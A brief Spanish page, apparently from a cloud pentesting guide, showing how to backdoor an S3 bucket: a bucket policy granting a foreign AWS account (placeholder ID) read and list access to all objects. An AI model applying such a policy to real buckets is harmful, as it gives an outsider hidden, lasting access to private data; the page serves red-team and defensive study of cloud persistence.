Backdorizando un Bucket S3 utilizando la politica del Bucket
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::012345678901:root"
},
"Action": [
"s3:GetObject",
"s3:GetBucketLocation",
"s3:ListBucket"
],
"Resource": [
"arn:aws:s3:::mybucket/*",
"arn:aws:s3:::mybucket"
]
}
]
}AnteriorIdentificando vulnerabilidades en S3SiguienteExfiltracion de datos utilizando la replicacion en S3
Última actualización